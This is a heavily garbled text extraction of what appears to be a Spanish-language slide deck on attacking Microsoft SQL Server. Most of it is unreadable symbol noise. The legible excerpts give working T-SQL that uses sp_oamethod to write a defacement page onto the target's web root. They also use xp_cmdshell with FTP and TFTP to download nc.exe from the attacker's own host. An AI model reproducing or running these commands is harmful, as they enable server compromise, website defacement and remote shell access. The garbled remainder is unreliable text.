MyPass 9 " . " " ) 6 & " " ; " * & . . " " ) " 9 " ) & " " " " " ># ! "> + >8< # ! "> 9 ) = " " ) " " " " ! " " " " " & " * " + = #0#$% # 6 " * " " " " + " " " 6 " * "
  • 38. 2B " Q " Q " Q " + " Q * . " Q " 6 ) " Q . < Q ) "M < Q . < Q . < Q . M + < Q . 6 < Q" 6 < Q " < Q < Q 6 . - $ % + ) % " & * " & " " " + " " ) " " " + 7 " . " " #$% 4 & * + " ' " ) 4 ) " " & 4 " " 9 * ( " " " ( 4 " > * > % " 7 "& 9 " ( 67" #$% E$ + +( 9 9 " < ) " " #$% 6= :,-'F& " 9 " " #5& " ) " " 322& ) " . * 9 " # ) & " . " + " #$%& . " . - " " & 9 4 * " 1 & " . " > . (( # + ; >& " M <& < " " 7 " 6 " H " . " * . " ----- Extracto ------------------------------------------ [...] La idea es crear una pagina html o asp, si en el sitio objetivo se encuentra activo y funciónando un webserver [...] declare @o int, @f int, @t int, @ret int exec sp_oacreate 'scripting.filesystemobject', @o out exec sp_oamethod @o, 'createtextfile', @f out, 'c:web-hostingattajdidindex3.html', 1 exec @ret=sp_oamethod @f, 'writeline', NULL, '<HTML> <HEAD><TITLE>Hola Mundo!!!</TITLE> </HEAD> <BODY text=black bgColor=#000000> <CENTER> <P><B>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT face=Arial color=#b4b58c size=7>Vosotros </B>Perejil...</B></FONT></P></CENTER> <P><BR><BR>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<!--" "-- ></P> <P></P> <CENTER> <P><B><FONT face=Arial color=#b4b58c size=7>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'nosotros vuestras </B>WEB<B>s!!!</B></FONT></P></CENTER> <P><BR><BR></P>'
  • 39. 2C exec @ret=sp_oamethod @f, 'writeline', NULL, '<DIV align=center> <CENTER> <TABLE cellSpacing=0 cellPadding=0 width=100 border=0>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<TBODY> <TR> <TD bgColor=#d20000>&nbsp;</TD></TR> <TR> <TD align=middle bgColor=#ffff00>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<FONT color=#ffff00 size=1>¡ORTO!<BR>¡¡¡Va por vosotros!!! </FONT></TD></TR> <TR> <TD ' exec @ret=sp_oamethod @f, 'writeline', NULL, 'bgColor=#d20000>&nbsp ;</TD></TR><!--" "-- ></TBODY></TABLE></CENTER></DIV> ' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P><BR><BR><BR><BR><BR></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=5> lagear & runlevel</FONT></P>' exec @ret=sp_oamethod @f, 'writeline', NULL, '<P align=right> <FONT face="Courier New" color=#00ff00 size=4>Recuerdos a <B>N</B>9<B>Team</B></FONT>' exec @ret=sp_oamethod @f, 'writeline', NULL, '</P> <P align=right> <FONT face="Courier New" color=#00ff00 size=3>' exec @ret=sp_oamethod @f, 'writeline', NULL, 'Donde te podemos encontrar BreakICE?</FONT></P> <FONT color=black>" </FONT> </BODY></HTML>' Para subir archivos.- Creamos un archivo get.txt para utilizar luego ftp declare @o int, @f int, @t int, @ret int EXECUTE sp_oacreate 'scripting.filesystemobject', @o out EXECUTE sp_oamethod @o, 'createtextfile', @f out, 'c:get.txt', 1 EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'user anonymous' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'guest' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'get nc.exe' EXECUTE @ret=sp_oamethod @f, 'writeline', NULL, 'quit' EXECUTE master.xp_cmdshell 'FTP -s c:get.txt NUESTROHOST' o algo mas fácil si tenemos un tftp en nuestro host EXECUTE master.xp_cmdshell 'TFTP -i NUESTROHOST GET c:mi_local_file c:remote_file'
  • 40. 3 ----- Extracto ------------------------------------------ :M& ) & ) " " ( " * " " )4 " . " " " 6 " " #0#$% # 6 & 6 " *=" " 9 " ) " . " " " 8 " " & " " Q + " Q 9 " " . " )4 :%8 " " * #$% # 6 E " 4 " . * "+" )4 F + " 7 " " " . )4 6 " ) " ; " Q . & c " & )4 M : ;! ; ` & < a ; " Q )4 M & ` & 6 : ;! ; a ` & ` V a ` : ;! ; a ` a a " 3 , + # ) " " " & 9 #0#$% " ) " " 9 " 7" " " "& ) 9 " . " " & " * " & 9 ) 4 .J 6 " " J " " ) " 7 " #$% 4 ! " 9 " D " + #$% 9 6 " ) " " " ) < " 6 & + = " ) " " " " ( " E: ) = " "IF & " + * " " " ) * " 6 " . & " " #$% + " 5 ) " * . >; : G ) 5 # + ! 4 > " " 7 . " " ) " " #$% 4 + " ) " " " " " 0 * # L 1;: : ;A %8L ' > > % + = " " + ) = " " J " " "
  • 41. 3 0 3 ! # )" " " ) " 1 :1 " ) H " " " E *Q* KF 1 " J " " " 0 +,- # )" " " ) " 1 :1 " ) ! " 5 " 1 " J " " " 0 $ . # ':!S E8 " " F # )" " " ) " 1 :1 " ) ! " 5 " J " " " " " ) "K 0 # )" " " ) " 1 :1 " ) ! " 5 " J " " " " " ) "K " " " " " " " * E< Q " & " Q " F "@ % & A . & 6 " . * % " " " 9 " " " * " ( ". * & " " 6 ) " " #0#$% " 7 " 4 " " ' " " & " " & " " . " . "& " " " " " ) ) ) " . 7 . " ( 6 # 6 ! M " " 6 " " 9 " " 6 7 . " ( " J " " " " 6 " " 9 " " 6 ! 4 *=" " " " 6 " ) " " 8" ) ( ! = ' ( A " 6= # * * " " < " " = " 8" + " ;'! 322 + ,! 323F 1 " " 6 " ) " " 6 ) " " 1 " " = & " 6 #$% " 6 " "
  • 42. 3 ! " " " . " . * . E, " 6 " ) " " " " . ( & M" ) * . F H * 9 6 " " " " " #0#$% # 6 8" ) ( " 6 . " "& " ) " " 9 ( " " " " 8" ) ( 6 " " . 6 " * " * E " " " . ) 0 " " " * ( " M " " MF 8" ) ( "" * #5 # " 9 " . & " " " * " . " 6 #0#$% 6 ' 1 4 ) ) " " 6 " " " " " " . " ( " . " H 6 ) " " ) " " ' 9 " " " " " " " " " >$ > " " " 9 " " . ) " " "A % B ! #0#$% # 6 " " & + " " ) " 7 " + 6 " " 6 " . " . " " " * " " " " . & 9 9 " ) " " " " " ) + + " ( " . 6 ( " " " " ) 4 " " " " " 6 " " " . ' " * & " " 9 . " 6 " " " 6 & < " " ) " " " " . + " " " " 9 + = " " " 6 " ) " & " ) < 7< " + " " 7 " M . " ) #0#$% # 6 8 " " " . "& " " + "* ( " " A " "& " " + # 6 " ! M" = & * . " " " 6 " ) " "& " . * " * 6 " " . G " & " ) " " 6 " " "& " " " " ) > .= " ) " . " . > + " " " " ) " " . & ) = 6 " #$% 4 . *= 4 # ) * " " & 74 " 6 " " * M . * " G " 8 " & " " " * "& " " " " " + " " " . * ) = " . " " " " 6 ) " 6 " E; " " #0#$%F 8" ) " " " " 9 " . " D " " . * ) " . ( # #;8 5 G "
  • 43. 32 ' 6 G " 2& + " " " ) " 9 " " " " ) " " " . E5 ( " 5 "& , 6 " # . & 8A#& F "= ) 7 %81;: " * " ( " " " " * & " " 9 " . ) " " #0 #& #0#$%& # " " 8 !& " " ) ( " * & " . & + 9 #:- 8 " " 6 5 " " 9 + "* " + 9 " ) " " " " " + " 6 " " & " " " 7 " 5 " 6 " . " " 7 " #$% 4 & 6 9 6 " " > * " + % " ' "> " " 9 " < 6 # " "& + " " < 5 " >5 . ! > "C ) * # % & ! & - M > M . 8< " G " > E #-1 B303B 022CB0@F " M . M " Q QG " "9 "9 Q 3 "9 " + " * "9 6 6 " + " " + " " #$% 4 G ! * " " " .Q#$%Q# 6 Q " .Q#$%Q 4 * < . "" " 6 Q"9 Q 4 * < . "" " Q 6 Q"9 Q 4 * < . "" " 0#$% * < . "" " M .0"9 0 "" " * < . "" " 6 .Q ) " Q" + * " " + 6 " ?,! 1 ! @8 " . " Q6 "9 " "D ! M < M " " + * " M M M " " + . ' M " #9 )* (
  • 44. 33 M " " + . 1; " " #9 M ( M " " + . G "9 < M " " + . G "9 . ( M " " + + . ) 5 "0 0 @0) ( << " " " " * " " " M " " MQJ " + " ; " " B % ! ( 01 ( , :! " 9 " " )+ 1 0 " . II )+ 5 . 0' ' % . " " F )+ 6 0S " * " ) " " " ) "I )+ 5 . 59 = 6. & ** " * . & " " 9 " " = " * " " 6 = " " " " " " ( . 6 . (( # + ; & " . " > > < 1 ) 9 " * " 9 = = & + 9 " ) " " "& " * 9 . " " + 9 " < " ) " " " " " " ) " " ) 8 " . . & . ( " " " 6 " " " " D " 1 + 6 9 " "* ( " " " * . 9 " " ") ( " " " " * " ; ) 7 . " = + # 9 " " " " " #0#$%& . " " " " . / " 9 " 9 67" " " " " " + * " " " #$% 4 E8" . O1 < / # + # * % d " " " J "KF ! & . " " 9 " . " " " " " " " . * & < " 9 D 5 " >5 . ! >